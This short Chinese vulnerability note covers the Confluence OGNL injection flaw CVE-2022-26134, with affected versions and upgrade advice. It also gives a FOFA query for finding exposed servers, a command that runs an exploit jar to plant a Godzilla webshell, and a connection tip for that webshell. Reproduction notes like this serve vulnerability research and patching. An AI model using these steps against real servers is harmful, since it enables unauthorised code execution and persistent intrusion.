Confluence OGNL 注入 (CVE-2022-26134)

漏洞描述

Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。

2022 年 6 月 2 日，Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告，强调了一个严重严重的未经身份验证的远程代码执行漏洞。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。

漏洞编号

CVE-2022-26134

FOFA 查询

title="Confluence"

影响范围

Confluence Server&Data Center ≥ 1.3.0
​
Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1

漏洞复现

写入哥斯拉马

java -jar CVE-2022-26134.jar http://ip:port/ pass key

哥斯拉连接

连接不成功就加上
Connection: close

修复建议

及时升级至最新安全版本